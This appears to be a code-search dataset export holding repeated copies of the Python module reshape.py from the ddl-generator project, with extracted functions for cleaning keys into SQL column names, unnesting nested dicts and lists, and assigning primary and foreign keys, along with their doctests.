elif isinstance(data, list) or isinstance(data, tuple) \
or hasattr(data, '__next__') or hasattr(data, 'next'):
data = [walk_and_clean(d) for d in data]
# Clean up any keys in this dict itself
if hasattr(data, 'items'):
original_keys = data.keys()
tup = ((clean_key_name(k), v) for (k, v) in data.items())
data = OrderedDict(tup)
if len(data) < len(original_keys):
raise KeyError('Cleaning up %s created duplicates' %
original_keys)
return data
class UniqueKey(object):
"""
Provides unique IDs.
>>> idp1 = UniqueKey('id', int, max=4)
>>> idp1.next()
5
>>> idp1.next()
6
>>> idp2 = UniqueKey('id', str)
>>> id2 = idp2.next()
>>> (len(id2), type(id2))
(32, <class 'str'>)
"""
def __init__(self, key_name, key_type, max=0):
self.name = key_name
if key_type != int and not hasattr(key_type, 'lower'):
raise NotImplementedError("Primary key field %s is %s, must be string or integer"
% (key_name, key_type))
self.type = key_type
self.max = max
def next(self):
if self.type == int:
self.max += 1
return self.max
else:
return md5().hexdigest()
def unnest_child_dict(parent, key, parent_name=''):
"""
If ``parent`` dictionary has a ``key`` whose ``val`` is a dict,
unnest ``val``'s fields into ``parent`` and remove ``key``.
>>> parent = {'province': 'Québec', 'capital': {'name': 'Québec City', 'pop': 491140}}
>>> unnest_child_dict(parent, 'capital', 'provinces')
>>> pprint(parent)
{'capital_name': 'Québec City', 'capital_pop': 491140, 'province': 'Québec'}
>>> parent = {'province': 'Québec', 'capital': {'id': 1, 'name': 'Québec City', 'pop': 491140}}
>>> unnest_child_dict(parent, 'capital', 'provinces')
>>> pprint(parent)
{'capital_id': 1,
'capital_name': 'Québec City',
'capital_pop': 491140,
'province': 'Québec'}
>>> parent = {'province': 'Québec', 'capital': {'id': 1, 'name': 'Québec City'}}
>>> unnest_child_dict(parent, 'capital', 'provinces')
>>> pprint(parent)
{'capital': 'Québec City', 'province': 'Québec'}
"""
val = parent[key]
name = "%s['%s']" % (parent_name, key)
logging.debug("Unnesting dict %s" % name)
id = _id_fieldname(val, parent_name)
if id:
logging.debug("%s is %s's ID" % (id, key))
if len(val) <= 2:
logging.debug('Removing ID column %s.%s' % (key, id))
val.pop(id)
if len(val) == 0:
logging.debug('%s is empty, removing from %s' % (name, parent_name))
parent.pop(key)
return
elif len(val) == 1:
logging.debug('Nested one-item dict in %s, making scalar.' % name)
parent[key] = list(val.values())[0]
return
else:
logging.debug('Pushing all fields from %s up to %s' % (name, parent_name))
new_field_names = ['%s_%s' % (key, child_key.strip('_')) for child_key in val]
overlap = (set(new_field_names) & set(parent)) - set(id or [])
if overlap:
logging.error("Could not unnest child %s; %s present in %s"
% (name, key, ','.join(overlap), parent_name))
return
for (child_key, child_val) in val.items():
new_field_name = '%s_%s' % (key, child_key.strip('_'))
parent[new_field_name] = child_val
parent.pop(key)
_sample_data = [{'province': 'Québec', 'capital': {'name': 'Québec City', 'pop': 491140},
'id': 1, 'province_id': 1,
'cities': [{'name': 'Montreal', 'pop': 1649519}, {'name': 'Laval', 'pop': 401553}]},
{'province': 'Ontario', 'capital': {'name': 'Toronto', 'pop': 2615060}, 'province_id': 2,
'cities': [{'name': 'Ottawa', 'pop': 883391}, {'name': 'Missisauga', 'pop': 713443}]},
{'province': 'New Brunswick', 'capital': {'name': 'Fredricton', 'pop': 56224},
'id': 3, 'province_id': 3,
'cities': [{'name': 'Saint John', 'pop': 70063}, {'name': 'Moncton', 'pop': 69074}]},
]
def all_values_for(data, field_name):
return [row.get(field_name) for row in data if field_name in row]
def unused_field_name(data, preferences):
for pref in preferences:
if not all_values_for(data, pref):
return pref
raise KeyError("All desired names already taken in %s" % self.name)
class ParentTable(list):
"""
List of ``dict``s that knows (or creates) its own primary key field.
>>> provinces = ParentTable(_sample_data, 'province', pk_name='province_id')
>>> provinces.pk.name
'province_id'
>>> [p[provinces.pk.name] for p in provinces]
[1, 2, 3]
>>> provinces.pk.max
3
Now if province_id is unusable because it's nonunique:
>>> data2 = copy.deepcopy(_sample_data)
>>> for row in data2: row['province_id'] = 4
>>> provinces2 = ParentTable(data2, 'province', pk_name='id', force_pk=True)
>>> provinces2.pk.name
'id'
>>> [p[provinces2.pk.name] for p in provinces2]
[1, 4, 3]
"""
def is_in_all_rows(self, value):
return len([1 for r in self if r.get(value)]) == len(self)
def __init__(self, data, singular_name, pk_name=None, force_pk=False):
self.name = singular_name
super(ParentTable, self).__init__(data)
self.pk_name = pk_name
if force_pk or (self.pk_name and self.is_in_all_rows(self.pk_name)):
self.assign_pk()
else:
self.pk = None
def suitability_as_key(self, key_name):
"""
Returns: (result, key_type)
``result`` is True, False, or 'absent' or 'partial' (both still usable)
``key_type`` is ``int`` for integer keys or ``str`` for hash keys
"""
pk_values = all_values_for(self, key_name)
if not pk_values:
return ('absent', int) # could still use it
key_type = type(th.best_coercable(pk_values))
num_unique_values = len(set(pk_values))
if num_unique_values < len(pk_values):
return (False, None) # non-unique
if num_unique_values == len(self):
return (True, key_type) # perfect!
return ('partial', key_type) # unique, but some rows need populating
def use_this_pk(self, pk_name, key_type):
if key_type == int:
self.pk = UniqueKey(pk_name, key_type, max([0, ] + all_values_for(self, pk_name)))
else:
self.pk = UniqueKey(pk_name, key_type)
def assign_pk(self):
"""
"""
if not self.pk_name:
self.pk_name = '%s_id' % self.name
logging.warning('Primary key %s.%s not requested, but nesting demands it'
% (self.name, self.pk_name))
(suitability, key_type) = self.suitability_as_key(self.pk_name)
if not suitability:
raise Exception('Duplicate values in %s.%s, unsuitable primary key'
% (self.name, self.pk_name))
self.use_this_pk(self.pk_name, key_type)
if suitability in ('absent', 'partial'):
for row in self:
if self.pk_name not in row:
row[self.pk_name] = self.pk.next()
def unnest_children(data, parent_name='', pk_name=None, force_pk=False):
"""
For each ``key`` in each row of ``data`` (which must be a list of dicts),
unnest any dict values into ``parent``, and remove list values into separate lists.
Return (``data``, ``pk_name``, ``children``, ``child_fk_names``) where
``data``
the transformed input list
``pk_name``
field name of ``data``'s (possibly new) primary key
``children``
a defaultdict(list) of data extracted from child lists
``child_fk_names``
dict of the foreign key field name in each child
"""
possible_fk_names = ['%s_id' % parent_name, '_%s_id' % parent_name, 'parent_id', ]
if pk_name:
possible_fk_names.insert(0, '%s_%s' % (parent_name, pk_name.strip('_')))
children = defaultdict(list)
field_names_used_by_children = defaultdict(set)
child_fk_names = {}
parent = ParentTable(data, parent_name, pk_name=pk_name, force_pk=force_pk)
for row in parent:
try:
for (key, val) in row.items():
if hasattr(val, 'items'):
unnest_child_dict(parent=row, key=key, parent_name=parent_name)
elif isinstance(val, list) or isinstance(val, tuple):
# force listed items to be dicts, not scalars
row[key] = [v if hasattr(v, 'items') else {key: v} for v in val]
except AttributeError:
raise TypeError('Each row should be a dictionary, got %s: %s' % (type(row), row))
for (key, val) in row.items():
if isinstance(val, list) or isinstance(val, tuple):
for child in val:
field_names_used_by_children[key].update(set(child.keys()))
for (child_name, names_in_use) in field_names_used_by_children.items():
if not parent.pk:
parent.assign_pk()
for fk_name in possible_fk_names:
if fk_name not in names_in_use:
break
else:
raise Exception("Cannot find unused field name in %s.%s to use as foreign key"
% (parent_name, child_name))
child_fk_names[child_name] = fk_name
for row in parent:
if child_name in row:
for child in row[child_name]:
child[fk_name] = row[parent.pk.name]
children[child_name].append(child)
row.pop(child_name)
# TODO: What if rows have a mix of scalar / list / dict types?
return (parent, parent.pk.name if parent.pk else None, children, child_fk_names)
if __name__ == '__main__':
doctest.testmod(optionflags=doctest.NORMALIZE_WHITESPACE)
|
catherinedevlin/ddl-generator | ddlgenerator/reshape.py | unnest_child_dict | python | def unnest_child_dict(parent, key, parent_name=''):
val = parent[key]
name = "%s['%s']" % (parent_name, key)
logging.debug("Unnesting dict %s" % name)
id = _id_fieldname(val, parent_name)
if id:
logging.debug("%s is %s's ID" % (id, key))
if len(val) <= 2:
logging.debug('Removing ID column %s.%s' % (key, id))
val.pop(id)
if len(val) == 0:
logging.debug('%s is empty, removing from %s' % (name, parent_name))
parent.pop(key)
return
elif len(val) == 1:
logging.debug('Nested one-item dict in %s, making scalar.' % name)
parent[key] = list(val.values())[0]
return
else:
logging.debug('Pushing all fields from %s up to %s' % (name, parent_name))
new_field_names = ['%s_%s' % (key, child_key.strip('_')) for child_key in val]
overlap = (set(new_field_names) & set(parent)) - set(id or [])
if overlap:
logging.error("Could not unnest child %s; %s present in %s"
% (name, key, ','.join(overlap), parent_name))
return
for (child_key, child_val) in val.items():
new_field_name = '%s_%s' % (key, child_key.strip('_'))
parent[new_field_name] = child_val
parent.pop(key) | If ``parent`` dictionary has a ``key`` whose ``val`` is a dict,
unnest ``val``'s fields into ``parent`` and remove ``key``.
>>> parent = {'province': 'Québec', 'capital': {'name': 'Québec City', 'pop': 491140}}
>>> unnest_child_dict(parent, 'capital', 'provinces')
>>> pprint(parent)
{'capital_name': 'Québec City', 'capital_pop': 491140, 'province': 'Québec'}
>>> parent = {'province': 'Québec', 'capital': {'id': 1, 'name': 'Québec City', 'pop': 491140}}
>>> unnest_child_dict(parent, 'capital', 'provinces')
>>> pprint(parent)
{'capital_id': 1,
'capital_name': 'Québec City',
'capital_pop': 491140,
'province': 'Québec'}
>>> parent = {'province': 'Québec', 'capital': {'id': 1, 'name': 'Québec City'}}
>>> unnest_child_dict(parent, 'capital', 'provinces')
>>> pprint(parent)
{'capital': 'Québec City', 'province': 'Québec'} | train | https://github.com/catherinedevlin/ddl-generator/blob/db6741216d1e9ad84b07d4ad281bfff021d344ea/ddlgenerator/reshape.py#L113-L165 | [
"def _id_fieldname(fieldnames, table_name = ''):\n \"\"\"\n Finds the field name from a dict likeliest to be its unique ID\n\n >>> _id_fieldname({'bar': True, 'id': 1}, 'foo')\n 'id'\n >>> _id_fieldname({'bar': True, 'foo_id': 1, 'goo_id': 2}, 'foo')\n 'foo_id'\n >>> _id_fieldname({'bar': True,... | #!/usr/bin/python
# -*- coding: utf8
import logging
from collections import OrderedDict, namedtuple, defaultdict
import doctest
from hashlib import md5
import hashlib
import copy
from pprint import pprint
from ddlgenerator.reserved import sql_reserved_words
import re
try:
import ddlgenerator.typehelpers as th
except ImportError:
import typehelpers as th # TODO: can py2/3 split this
_illegal_in_column_name = re.compile(r'[^a-zA-Z0-9_$#]')
def clean_key_name(key):
"""
Makes ``key`` a valid and appropriate SQL column name:
1. Replaces illegal characters in column names with ``_``
2. Prevents name from beginning with a digit (prepends ``_``)
3. Lowercases name. If you want case-sensitive table
or column names, you are a bad person and you should feel bad.
"""
result = _illegal_in_column_name.sub("_", key.strip())
if result[0].isdigit():
result = '_%s' % result
if result.upper() in sql_reserved_words:
result = '_%s' % key
return result.lower()
def walk_and_clean(data):
"""
Recursively walks list of dicts (which may themselves embed lists and dicts),
transforming namedtuples to OrderedDicts and
using ``clean_key_name(k)`` to make keys into SQL-safe column names
>>> data = [{'a': 1}, [{'B': 2}, {'B': 3}], {'F': {'G': 4}}]
>>> pprint(walk_and_clean(data))
[OrderedDict([('a', 1)]),
[OrderedDict([('b', 2)]), OrderedDict([('b', 3)])],
OrderedDict([('f', OrderedDict([('g', 4)]))])]
"""
# transform namedtuples to OrderedDicts
if hasattr(data, '_fields'):
data = OrderedDict((k,v) for (k,v) in zip(data._fields, data))
# Recursively clean up child dicts and lists
if hasattr(data, 'items') and hasattr(data, '__setitem__'):
for (key, val) in data.items():
data[key] = walk_and_clean(val)
elif isinstance(data, list) or isinstance(data, tuple) \
or hasattr(data, '__next__') or hasattr(data, 'next'):
data = [walk_and_clean(d) for d in data]
# Clean up any keys in this dict itself
if hasattr(data, 'items'):
original_keys = data.keys()
tup = ((clean_key_name(k), v) for (k, v) in data.items())
data = OrderedDict(tup)
if len(data) < len(original_keys):
raise KeyError('Cleaning up %s created duplicates' %
original_keys)
return data
def _id_fieldname(fieldnames, table_name = ''):
"""
Finds the field name from a dict likeliest to be its unique ID
>>> _id_fieldname({'bar': True, 'id': 1}, 'foo')
'id'
>>> _id_fieldname({'bar': True, 'foo_id': 1, 'goo_id': 2}, 'foo')
'foo_id'
>>> _id_fieldname({'bar': True, 'baz': 1, 'baz_id': 3}, 'foo')
"""
templates = ['%s_%%s' % table_name, '%s', '_%s']
for stub in ['id', 'num', 'no', 'number']:
for t in templates:
if t % stub in fieldnames:
return t % stub
class UniqueKey(object):
"""
Provides unique IDs.
>>> idp1 = UniqueKey('id', int, max=4)
>>> idp1.next()
5
>>> idp1.next()
6
>>> idp2 = UniqueKey('id', str)
>>> id2 = idp2.next()
>>> (len(id2), type(id2))
(32, <class 'str'>)
"""
def __init__(self, key_name, key_type, max=0):
self.name = key_name
if key_type != int and not hasattr(key_type, 'lower'):
raise NotImplementedError("Primary key field %s is %s, must be string or integer"
% (key_name, key_type))
self.type = key_type
self.max = max
def next(self):
if self.type == int:
self.max += 1
return self.max
else:
return md5().hexdigest()
_sample_data = [{'province': 'Québec', 'capital': {'name': 'Québec City', 'pop': 491140},
'id': 1, 'province_id': 1,
'cities': [{'name': 'Montreal', 'pop': 1649519}, {'name': 'Laval', 'pop': 401553}]},
{'province': 'Ontario', 'capital': {'name': 'Toronto', 'pop': 2615060}, 'province_id': 2,
'cities': [{'name': 'Ottawa', 'pop': 883391}, {'name': 'Missisauga', 'pop': 713443}]},
{'province': 'New Brunswick', 'capital': {'name': 'Fredricton', 'pop': 56224},
'id': 3, 'province_id': 3,
'cities': [{'name': 'Saint John', 'pop': 70063}, {'name': 'Moncton', 'pop': 69074}]},
]
def all_values_for(data, field_name):
return [row.get(field_name) for row in data if field_name in row]
def unused_field_name(data, preferences):
for pref in preferences:
if not all_values_for(data, pref):
return pref
raise KeyError("All desired names already taken in %s" % self.name)
class ParentTable(list):
"""
List of ``dict``s that knows (or creates) its own primary key field.
>>> provinces = ParentTable(_sample_data, 'province', pk_name='province_id')
>>> provinces.pk.name
'province_id'
>>> [p[provinces.pk.name] for p in provinces]
[1, 2, 3]
>>> provinces.pk.max
3
Now if province_id is unusable because it's nonunique:
>>> data2 = copy.deepcopy(_sample_data)
>>> for row in data2: row['province_id'] = 4
>>> provinces2 = ParentTable(data2, 'province', pk_name='id', force_pk=True)
>>> provinces2.pk.name
'id'
>>> [p[provinces2.pk.name] for p in provinces2]
[1, 4, 3]
"""
def is_in_all_rows(self, value):
return len([1 for r in self if r.get(value)]) == len(self)
def __init__(self, data, singular_name, pk_name=None, force_pk=False):
self.name = singular_name
super(ParentTable, self).__init__(data)
self.pk_name = pk_name
if force_pk or (self.pk_name and self.is_in_all_rows(self.pk_name)):
self.assign_pk()
else:
self.pk = None
def suitability_as_key(self, key_name):
"""
Returns: (result, key_type)
``result`` is True, False, or 'absent' or 'partial' (both still usable)
``key_type`` is ``int`` for integer keys or ``str`` for hash keys
"""
pk_values = all_values_for(self, key_name)
if not pk_values:
return ('absent', int) # could still use it
key_type = type(th.best_coercable(pk_values))
num_unique_values = len(set(pk_values))
if num_unique_values < len(pk_values):
return (False, None) # non-unique
if num_unique_values == len(self):
return (True, key_type) # perfect!
return ('partial', key_type) # unique, but some rows need populating
def use_this_pk(self, pk_name, key_type):
if key_type == int:
self.pk = UniqueKey(pk_name, key_type, max([0, ] + all_values_for(self, pk_name)))
else:
self.pk = UniqueKey(pk_name, key_type)
def assign_pk(self):
"""
"""
if not self.pk_name:
self.pk_name = '%s_id' % self.name
logging.warning('Primary key %s.%s not requested, but nesting demands it'
% (self.name, self.pk_name))
(suitability, key_type) = self.suitability_as_key(self.pk_name)
if not suitability:
raise Exception('Duplicate values in %s.%s, unsuitable primary key'
% (self.name, self.pk_name))
self.use_this_pk(self.pk_name, key_type)
if suitability in ('absent', 'partial'):
for row in self:
if self.pk_name not in row:
row[self.pk_name] = self.pk.next()
def unnest_children(data, parent_name='', pk_name=None, force_pk=False):
"""
For each ``key`` in each row of ``data`` (which must be a list of dicts),
unnest any dict values into ``parent``, and remove list values into separate lists.
Return (``data``, ``pk_name``, ``children``, ``child_fk_names``) where
``data``
the transformed input list
``pk_name``
field name of ``data``'s (possibly new) primary key
``children``
a defaultdict(list) of data extracted from child lists
``child_fk_names``
dict of the foreign key field name in each child
"""
possible_fk_names = ['%s_id' % parent_name, '_%s_id' % parent_name, 'parent_id', ]
if pk_name:
possible_fk_names.insert(0, '%s_%s' % (parent_name, pk_name.strip('_')))
children = defaultdict(list)
field_names_used_by_children = defaultdict(set)
child_fk_names = {}
parent = ParentTable(data, parent_name, pk_name=pk_name, force_pk=force_pk)
for row in parent:
try:
for (key, val) in row.items():
if hasattr(val, 'items'):
unnest_child_dict(parent=row, key=key, parent_name=parent_name)
elif isinstance(val, list) or isinstance(val, tuple):
# force listed items to be dicts, not scalars
row[key] = [v if hasattr(v, 'items') else {key: v} for v in val]
except AttributeError:
raise TypeError('Each row should be a dictionary, got %s: %s' % (type(row), row))
for (key, val) in row.items():
if isinstance(val, list) or isinstance(val, tuple):
for child in val:
field_names_used_by_children[key].update(set(child.keys()))
for (child_name, names_in_use) in field_names_used_by_children.items():
if not parent.pk:
parent.assign_pk()
for fk_name in possible_fk_names:
if fk_name not in names_in_use:
break
else:
raise Exception("Cannot find unused field name in %s.%s to use as foreign key"
% (parent_name, child_name))
child_fk_names[child_name] = fk_name
for row in parent:
if child_name in row:
for child in row[child_name]:
child[fk_name] = row[parent.pk.name]
children[child_name].append(child)
row.pop(child_name)
# TODO: What if rows have a mix of scalar / list / dict types?
return (parent, parent.pk.name if parent.pk else None, children, child_fk_names)
if __name__ == '__main__':
doctest.testmod(optionflags=doctest.NORMALIZE_WHITESPACE)
|
catherinedevlin/ddl-generator | ddlgenerator/reshape.py | unnest_children | python | def unnest_children(data, parent_name='', pk_name=None, force_pk=False):
possible_fk_names = ['%s_id' % parent_name, '_%s_id' % parent_name, 'parent_id', ]
if pk_name:
possible_fk_names.insert(0, '%s_%s' % (parent_name, pk_name.strip('_')))
children = defaultdict(list)
field_names_used_by_children = defaultdict(set)
child_fk_names = {}
parent = ParentTable(data, parent_name, pk_name=pk_name, force_pk=force_pk)
for row in parent:
try:
for (key, val) in row.items():
if hasattr(val, 'items'):
unnest_child_dict(parent=row, key=key, parent_name=parent_name)
elif isinstance(val, list) or isinstance(val, tuple):
# force listed items to be dicts, not scalars
row[key] = [v if hasattr(v, 'items') else {key: v} for v in val]
except AttributeError:
raise TypeError('Each row should be a dictionary, got %s: %s' % (type(row), row))
for (key, val) in row.items():
if isinstance(val, list) or isinstance(val, tuple):
for child in val:
field_names_used_by_children[key].update(set(child.keys()))
for (child_name, names_in_use) in field_names_used_by_children.items():
if not parent.pk:
parent.assign_pk()
for fk_name in possible_fk_names:
if fk_name not in names_in_use:
break
else:
raise Exception("Cannot find unused field name in %s.%s to use as foreign key"
% (parent_name, child_name))
child_fk_names[child_name] = fk_name
for row in parent:
if child_name in row:
for child in row[child_name]:
child[fk_name] = row[parent.pk.name]
children[child_name].append(child)
row.pop(child_name)
# TODO: What if rows have a mix of scalar / list / dict types?
return (parent, parent.pk.name if parent.pk else None, children, child_fk_names) | For each ``key`` in each row of ``data`` (which must be a list of dicts),
unnest any dict values into ``parent``, and remove list values into separate lists.
Return (``data``, ``pk_name``, ``children``, ``child_fk_names``) where
``data``
the transformed input list
``pk_name``
field name of ``data``'s (possibly new) primary key
``children``
a defaultdict(list) of data extracted from child lists
``child_fk_names``
dict of the foreign key field name in each child | train | https://github.com/catherinedevlin/ddl-generator/blob/db6741216d1e9ad84b07d4ad281bfff021d344ea/ddlgenerator/reshape.py#L263-L318 | [
"def unnest_child_dict(parent, key, parent_name=''):\n \"\"\"\n If ``parent`` dictionary has a ``key`` whose ``val`` is a dict,\n unnest ``val``'s fields into ``parent`` and remove ``key``.\n\n >>> parent = {'province': 'Québec', 'capital': {'name': 'Québec City', 'pop': 491140}}\n >>> unnest_child_d... | #!/usr/bin/python
# -*- coding: utf8
import logging
from collections import OrderedDict, namedtuple, defaultdict
import doctest
from hashlib import md5
import hashlib
import copy
from pprint import pprint
from ddlgenerator.reserved import sql_reserved_words
import re
try:
import ddlgenerator.typehelpers as th
except ImportError:
import typehelpers as th # TODO: can py2/3 split this
_illegal_in_column_name = re.compile(r'[^a-zA-Z0-9_$#]')
def clean_key_name(key):
"""
Makes ``key`` a valid and appropriate SQL column name:
1. Replaces illegal characters in column names with ``_``
2. Prevents name from beginning with a digit (prepends ``_``)
3. Lowercases name. If you want case-sensitive table
or column names, you are a bad person and you should feel bad.
"""
result = _illegal_in_column_name.sub("_", key.strip())
if result[0].isdigit():
result = '_%s' % result
if result.upper() in sql_reserved_words:
result = '_%s' % key
return result.lower()
def walk_and_clean(data):
"""
Recursively walks list of dicts (which may themselves embed lists and dicts),
transforming namedtuples to OrderedDicts and
using ``clean_key_name(k)`` to make keys into SQL-safe column names
>>> data = [{'a': 1}, [{'B': 2}, {'B': 3}], {'F': {'G': 4}}]
>>> pprint(walk_and_clean(data))
[OrderedDict([('a', 1)]),
[OrderedDict([('b', 2)]), OrderedDict([('b', 3)])],
OrderedDict([('f', OrderedDict([('g', 4)]))])]
"""
# transform namedtuples to OrderedDicts
if hasattr(data, '_fields'):
data = OrderedDict((k,v) for (k,v) in zip(data._fields, data))
# Recursively clean up child dicts and lists
if hasattr(data, 'items') and hasattr(data, '__setitem__'):
for (key, val) in data.items():
data[key] = walk_and_clean(val)
elif isinstance(data, list) or isinstance(data, tuple) \
or hasattr(data, '__next__') or hasattr(data, 'next'):
data = [walk_and_clean(d) for d in data]
# Clean up any keys in this dict itself
if hasattr(data, 'items'):
original_keys = data.keys()
tup = ((clean_key_name(k), v) for (k, v) in data.items())
data = OrderedDict(tup)
if len(data) < len(original_keys):
raise KeyError('Cleaning up %s created duplicates' %
original_keys)
return data
def _id_fieldname(fieldnames, table_name = ''):
"""
Finds the field name from a dict likeliest to be its unique ID
>>> _id_fieldname({'bar': True, 'id': 1}, 'foo')
'id'
>>> _id_fieldname({'bar': True, 'foo_id': 1, 'goo_id': 2}, 'foo')
'foo_id'
>>> _id_fieldname({'bar': True, 'baz': 1, 'baz_id': 3}, 'foo')
"""
templates = ['%s_%%s' % table_name, '%s', '_%s']
for stub in ['id', 'num', 'no', 'number']:
for t in templates:
if t % stub in fieldnames:
return t % stub
class UniqueKey(object):
"""
Provides unique IDs.
>>> idp1 = UniqueKey('id', int, max=4)
>>> idp1.next()
5
>>> idp1.next()
6
>>> idp2 = UniqueKey('id', str)
>>> id2 = idp2.next()
>>> (len(id2), type(id2))
(32, <class 'str'>)
"""
def __init__(self, key_name, key_type, max=0):
self.name = key_name
if key_type != int and not hasattr(key_type, 'lower'):
raise NotImplementedError("Primary key field %s is %s, must be string or integer"
% (key_name, key_type))
self.type = key_type
self.max = max
def next(self):
if self.type == int:
self.max += 1
return self.max
else:
return md5().hexdigest()
def unnest_child_dict(parent, key, parent_name=''):
"""
If ``parent`` dictionary has a ``key`` whose ``val`` is a dict,
unnest ``val``'s fields into ``parent`` and remove ``key``.
>>> parent = {'province': 'Québec', 'capital': {'name': 'Québec City', 'pop': 491140}}
>>> unnest_child_dict(parent, 'capital', 'provinces')
>>> pprint(parent)
{'capital_name': 'Québec City', 'capital_pop': 491140, 'province': 'Québec'}
>>> parent = {'province': 'Québec', 'capital': {'id': 1, 'name': 'Québec City', 'pop': 491140}}
>>> unnest_child_dict(parent, 'capital', 'provinces')
>>> pprint(parent)
{'capital_id': 1,
'capital_name': 'Québec City',
'capital_pop': 491140,
'province': 'Québec'}
>>> parent = {'province': 'Québec', 'capital': {'id': 1, 'name': 'Québec City'}}
>>> unnest_child_dict(parent, 'capital', 'provinces')
>>> pprint(parent)
{'capital': 'Québec City', 'province': 'Québec'}
"""
val = parent[key]
name = "%s['%s']" % (parent_name, key)
logging.debug("Unnesting dict %s" % name)
id = _id_fieldname(val, parent_name)
if id:
logging.debug("%s is %s's ID" % (id, key))
if len(val) <= 2:
logging.debug('Removing ID column %s.%s' % (key, id))
val.pop(id)
if len(val) == 0:
logging.debug('%s is empty, removing from %s' % (name, parent_name))
parent.pop(key)
return
elif len(val) == 1:
logging.debug('Nested one-item dict in %s, making scalar.' % name)
parent[key] = list(val.values())[0]
return
else:
logging.debug('Pushing all fields from %s up to %s' % (name, parent_name))
new_field_names = ['%s_%s' % (key, child_key.strip('_')) for child_key in val]
overlap = (set(new_field_names) & set(parent)) - set(id or [])
if overlap:
logging.error("Could not unnest child %s; %s present in %s"
% (name, key, ','.join(overlap), parent_name))
return
for (child_key, child_val) in val.items():
new_field_name = '%s_%s' % (key, child_key.strip('_'))
parent[new_field_name] = child_val
parent.pop(key)
_sample_data = [{'province': 'Québec', 'capital': {'name': 'Québec City', 'pop': 491140},
'id': 1, 'province_id': 1,
'cities': [{'name': 'Montreal', 'pop': 1649519}, {'name': 'Laval', 'pop': 401553}]},
{'province': 'Ontario', 'capital': {'name': 'Toronto', 'pop': 2615060}, 'province_id': 2,
'cities': [{'name': 'Ottawa', 'pop': 883391}, {'name': 'Missisauga', 'pop': 713443}]},
{'province': 'New Brunswick', 'capital': {'name': 'Fredricton', 'pop': 56224},
'id': 3, 'province_id': 3,
'cities': [{'name': 'Saint John', 'pop': 70063}, {'name': 'Moncton', 'pop': 69074}]},
]
def all_values_for(data, field_name):
return [row.get(field_name) for row in data if field_name in row]
def unused_field_name(data, preferences):
for pref in preferences:
if not all_values_for(data, pref):
return pref
raise KeyError("All desired names already taken in %s" % self.name)
class ParentTable(list):
"""
List of ``dict``s that knows (or creates) its own primary key field.
>>> provinces = ParentTable(_sample_data, 'province', pk_name='province_id')
>>> provinces.pk.name
'province_id'
>>> [p[provinces.pk.name] for p in provinces]
[1, 2, 3]
>>> provinces.pk.max
3
Now if province_id is unusable because it's nonunique:
>>> data2 = copy.deepcopy(_sample_data)
>>> for row in data2: row['province_id'] = 4
>>> provinces2 = ParentTable(data2, 'province', pk_name='id', force_pk=True)
>>> provinces2.pk.name
'id'
>>> [p[provinces2.pk.name] for p in provinces2]
[1, 4, 3]
"""
def is_in_all_rows(self, value):
return len([1 for r in self if r.get(value)]) == len(self)
def __init__(self, data, singular_name, pk_name=None, force_pk=False):
self.name = singular_name
super(ParentTable, self).__init__(data)
self.pk_name = pk_name
if force_pk or (self.pk_name and self.is_in_all_rows(self.pk_name)):
self.assign_pk()
else:
self.pk = None
def suitability_as_key(self, key_name):
"""
Returns: (result, key_type)
``result`` is True, False, or 'absent' or 'partial' (both still usable)
``key_type`` is ``int`` for integer keys or ``str`` for hash keys
"""
pk_values = all_values_for(self, key_name)
if not pk_values:
return ('absent', int) # could still use it
key_type = type(th.best_coercable(pk_values))
num_unique_values = len(set(pk_values))
if num_unique_values < len(pk_values):
return (False, None) # non-unique
if num_unique_values == len(self):
return (True, key_type) # perfect!
return ('partial', key_type) # unique, but some rows need populating
def use_this_pk(self, pk_name, key_type):
if key_type == int:
self.pk = UniqueKey(pk_name, key_type, max([0, ] + all_values_for(self, pk_name)))
else:
self.pk = UniqueKey(pk_name, key_type)
def assign_pk(self):
"""
"""
if not self.pk_name:
self.pk_name = '%s_id' % self.name
logging.warning('Primary key %s.%s not requested, but nesting demands it'
% (self.name, self.pk_name))
(suitability, key_type) = self.suitability_as_key(self.pk_name)
if not suitability:
raise Exception('Duplicate values in %s.%s, unsuitable primary key'
% (self.name, self.pk_name))
self.use_this_pk(self.pk_name, key_type)
if suitability in ('absent', 'partial'):
for row in self:
if self.pk_name not in row:
row[self.pk_name] = self.pk.next()
if __name__ == '__main__':
doctest.testmod(optionflags=doctest.NORMALIZE_WHITESPACE)
|
catherinedevlin/ddl-generator | ddlgenerator/reshape.py | ParentTable.suitability_as_key | python | def suitability_as_key(self, key_name):
pk_values = all_values_for(self, key_name)
if not pk_values:
return ('absent', int) # could still use it
key_type = type(th.best_coercable(pk_values))
num_unique_values = len(set(pk_values))
if num_unique_values < len(pk_values):
return (False, None) # non-unique
if num_unique_values == len(self):
return (True, key_type) # perfect!
return ('partial', key_type) | Returns: (result, key_type)
``result`` is True, False, or 'absent' or 'partial' (both still usable)
``key_type`` is ``int`` for integer keys or ``str`` for hash keys | train | https://github.com/catherinedevlin/ddl-generator/blob/db6741216d1e9ad84b07d4ad281bfff021d344ea/ddlgenerator/reshape.py#L220-L236 | [
"def all_values_for(data, field_name):\n return [row.get(field_name) for row in data if field_name in row]\n",
"def best_coercable(data):\n \"\"\"\n Given an iterable of scalar data, returns the datum representing the most specific\n data type the list overall can be coerced into, preferring datetimes... | class ParentTable(list):
"""
List of ``dict``s that knows (or creates) its own primary key field.
>>> provinces = ParentTable(_sample_data, 'province', pk_name='province_id')
>>> provinces.pk.name
'province_id'
>>> [p[provinces.pk.name] for p in provinces]
[1, 2, 3]
>>> provinces.pk.max
3
Now if province_id is unusable because it's nonunique:
>>> data2 = copy.deepcopy(_sample_data)
>>> for row in data2: row['province_id'] = 4
>>> provinces2 = ParentTable(data2, 'province', pk_name='id', force_pk=True)
>>> provinces2.pk.name
'id'
>>> [p[provinces2.pk.name] for p in provinces2]
[1, 4, 3]
"""
def is_in_all_rows(self, value):
return len([1 for r in self if r.get(value)]) == len(self)
def __init__(self, data, singular_name, pk_name=None, force_pk=False):
self.name = singular_name
super(ParentTable, self).__init__(data)
self.pk_name = pk_name
if force_pk or (self.pk_name and self.is_in_all_rows(self.pk_name)):
self.assign_pk()
else:
self.pk = None
# unique, but some rows need populating
def use_this_pk(self, pk_name, key_type):
if key_type == int:
self.pk = UniqueKey(pk_name, key_type, max([0, ] + all_values_for(self, pk_name)))
else:
self.pk = UniqueKey(pk_name, key_type)
def assign_pk(self):
"""
"""
if not self.pk_name:
self.pk_name = '%s_id' % self.name
logging.warning('Primary key %s.%s not requested, but nesting demands it'
% (self.name, self.pk_name))
(suitability, key_type) = self.suitability_as_key(self.pk_name)
if not suitability:
raise Exception('Duplicate values in %s.%s, unsuitable primary key'
% (self.name, self.pk_name))
